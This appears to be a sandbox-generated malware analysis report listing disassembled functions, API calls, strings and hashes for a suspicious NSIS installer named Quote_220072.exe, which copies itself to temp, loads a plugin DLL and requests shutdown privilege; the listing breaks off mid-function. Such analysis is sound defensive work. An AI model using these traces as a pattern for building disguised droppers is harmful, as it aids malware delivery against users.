GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
DeleteFileW.KERNELBASE(1033), ref: 00403A05

Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quote_220072.exe,00000400), ref: 004033FA

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403AA8
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403ABB
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403ACA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403AD9
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
CopyFileW.KERNEL32(C:\Users\user\Desktop\Quote_220072.exe,0079F200,00000001), ref: 00403B66
CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F

Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E

OleUninitialize.OLE32(00000000), ref: 00403BCD
ExitProcess.KERNEL32 ref: 00403BE4
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E

Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\Quote_220072.exe",?,"C:\Users\user\Desktop\Quote_220072.exe",00000000), ref: 004065EA

Strings

Error launching installer, xrefs: 00403A4D
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
"C:\Users\user\Desktop\Quote_220072.exe", xrefs: 00403856, 0040388C, 00403894, 00403A22, 00403A2E
~nsu, xrefs: 00403A9C
C:\Users\user\overlays\besvangredes, xrefs: 0040397E, 00403A6D, 00403B07, 00403B15
C:\Users\user\Desktop\Quote_220072.exe, xrefs: 00403B61
Low, xrefs: 004039CC
NSIS Error, xrefs: 00403840
C:\Users\user\AppData\Local\Temp\, xrefs: 0040398E, 00403993, 004039A9, 004039B5, 004039C4, 004039D1, 004039DD, 004039E5, 00403AA1, 00403AB6, 00403AC5, 00403AD4, 00403AE7, 00403AFC, 00403BB4
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
1033, xrefs: 00403A00
\Temp, xrefs: 004039B0
TEMP, xrefs: 004039DE
.tmp, xrefs: 00403AC0
SeShutdownPrivilege, xrefs: 00403C10
TMP, xrefs: 004039E6

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Quote_220072.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Quote_220072.exe$C:\Users\user\overlays\besvangredes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1283633765
Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

Function 6FF82351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FF8294E
lstrcpyW.KERNEL32(00000008,?), ref: 6FF829A4
lstrcpyW.KERNEL32(00000808,?), ref: 6FF829AF
GlobalFree.KERNEL32(00000000), ref: 6FF829C0
GlobalFree.KERNEL32(?), ref: 6FF82A44
GlobalFree.KERNEL32(?), ref: 6FF82A4A
GlobalFree.KERNEL32(?), ref: 6FF82A50
GetModuleHandleW.KERNEL32(00000008), ref: 6FF82B1A
LoadLibraryW.KERNEL32(00000008), ref: 6FF82B2B
GetProcAddress.KERNEL32(?,?), ref: 6FF82B82
lstrlenW.KERNEL32(00000808), ref: 6FF82B9D

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
Instruction ID: 14d75f44c2bf112e64bfb1557c7cfcdfab37adebc0f739b83f76f6013975dfe7
Opcode Fuzzy Hash: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
Instruction Fuzzy Hash: FC429072A487029FD718CF3889547AAB7F0FF89714F004A2EE5B9D6290E771F5448B92

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
lstrlenW.KERNEL32(?), ref: 00406799
FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
FindClose.KERNEL32(00000000), ref: 00406853

Strings

\*.*, xrefs: 0040676B

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

Function 004065AD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAF
ShowWindow.USER32(?), ref: 00404FD9
GetWindowLongW.USER32(?,000000F0), ref: 00404FEA
ShowWindow.USER32(?,00000004), ref: 00405006
GetDlgItem.USER32(?,00000001), ref: 0040512D
GetDlgItem.USER32(?,00000002), ref: 00405137
SetClassLongW.USER32(?,000000F2,?), ref: 00405151
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519F
GetDlgItem.USER32(?,00000003), ref: 0040524E
ShowWindow.USER32(00000000,?), ref: 00405277
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040528B
KiUserCallbackDispatcher.NTDLL(?), ref: 0040529F
EnableWindow.USER32(?), ref: 004052B7
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CE
EnableMenuItem.USER32(00000000), ref: 004052D5
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E6
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FD
lstrlenW.KERNEL32(Varighedskravs Setup: Installing,?,Varighedskravs Setup: Installing,00000000), ref: 0040532E

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,?), ref: 0040604E

SetWindowTextW.USER32(?,Varighedskravs Setup: Installing), ref: 00405346

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 0040538E
CreateDialogParamW.USER32(?,?,-007A8560), ref: 004053C2

Part of subcall function 004054F8: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405512

GetDlgItem.USER32(?,000003FA), ref: 004053EB
GetWindowRect.USER32(00000000), ref: 004053F2
ScreenToClient.USER32(?,?), ref: 004053FE
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405417
ShowWindow.USER32(00000008,?,00000000), ref: 00405436

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

ShowWindow.USER32(?,0000000A), ref: 0040547C

Strings

Varighedskravs Setup: Installing, xrefs: 0040531C, 00405329, 00405340

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Varighedskravs Setup: Installing
API String ID: 162979904-452364317
Opcode ID: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction ID: 456415ec42eff5e8f6a9a9f0208e2dc106d0a6226250255d67da48920511729f
Opcode Fuzzy Hash: 72123b1cd148b1eb205aab3943036d4082e425be0be4f9ae0839b9c0fe245c6a
Instruction Fuzzy Hash: 38D1C071904B10ABDB20AF21EE44A6B7B68FB89355F00853EF545B21E1CA3D8851CFAD

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004068C4: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
Part of subcall function 004068C4: GetProcAddress.KERNEL32(00000000), ref: 004068EE

lstrcatW.KERNEL32(1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000,00000002,00000000,76F93420,00000000,76F93170), ref: 00405A9F
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000,00000002,00000000), ref: 00405B23
lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\overlays\besvangredes,1033,Varighedskravs Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Varighedskravs Setup: Installing,00000000), ref: 00405B38
GetFileAttributesW.KERNEL32(Call), ref: 00405B43
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\overlays\besvangredes), ref: 00405B8C

Part of subcall function 004065FD: wsprintfW.USER32 ref: 0040660A

RegisterClassW.USER32(007A74E0), ref: 00405BD1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE8
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1D
ShowWindow.USER32(00000005,00000000), ref: 00405C4F
GetClassInfoW.USER32(00000000,RichEdit20W,007A74E0), ref: 00405C7A
GetClassInfoW.USER32(00000000,RichEdit,007A74E0), ref: 00405C87
RegisterClassW.USER32(007A74E0), ref: 00405C94
DialogBoxParamW.USER32(?,00000000,00404F70,00000000), ref: 00405CAF

Strings

Call, xrefs: 00405AE4, 00405AED, 00405AFE, 00405B52, 00405B58
Control Panel\Desktop\ResourceLocale, xrefs: 00405A5C
C:\Users\user\overlays\besvangredes, xrefs: 00405AAE, 00405AC0, 00405B5F, 00405B65, 00405B75
tz, xrefs: 00405B94
_Nb, xrefs: 00405BB0, 00405C17
RichEd20, xrefs: 00405C55
Varighedskravs Setup: Installing, xrefs: 00405A4F, 00405A5A, 00405A7A, 00405A84, 00405A99
RichEd32, xrefs: 00405C63
1033, xrefs: 00405A3F, 00405A63, 00405A9A
.DEFAULT\Control Panel\International, xrefs: 00405A8A
RichEdit20W, xrefs: 00405C74, 00405C8A
.exe, xrefs: 00405B32
RichEdit, xrefs: 00405C81

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\overlays\besvangredes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Varighedskravs Setup: Installing$_Nb$tz
API String ID: 1975747703-1438879052
Opcode ID: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction ID: 09b92c81f8f4ef2e2e9fd8d830fcc712f1cdd6db1c368b512ccdb95b409c048d
Opcode Fuzzy Hash: d8277d97e2f230740c86ea31856198af6673e632619b6bda425b05bf07e2b6f7
Instruction Fuzzy Hash: 31611370604604BEE7107B65AD42F2B366CEB46748F11813EF941B61E2EB3CA9108FAD

Function 0040154A Relevance: 35.4, APIs: 17, Strings: 3, Instructions: 441
stringtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 004015F1
Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
SetForegroundWindow.USER32 ref: 00401634
ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
SetCurrentDirectoryW.KERNELBASE(00000000,007B4000,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
lstrcatW.KERNEL32(00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82

Strings

Call, xrefs: 004018FC, 00401906, 00401913, 00401925, 00401933, 00401968, 0040197C, 004019A2, 004019EA, 00401A7A, 00401A81, 00401A8B, 00401A96
C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll, xrefs: 00401789, 004017F8, 00401823, 004019B1, 004019D2
C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp, xrefs: 00401998, 004019BB

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
String ID: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp$C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll$Call
API String ID: 3895412863-1897634878
Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F

Function 004033CB Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033DE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quote_220072.exe,00000400), ref: 004033FA

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
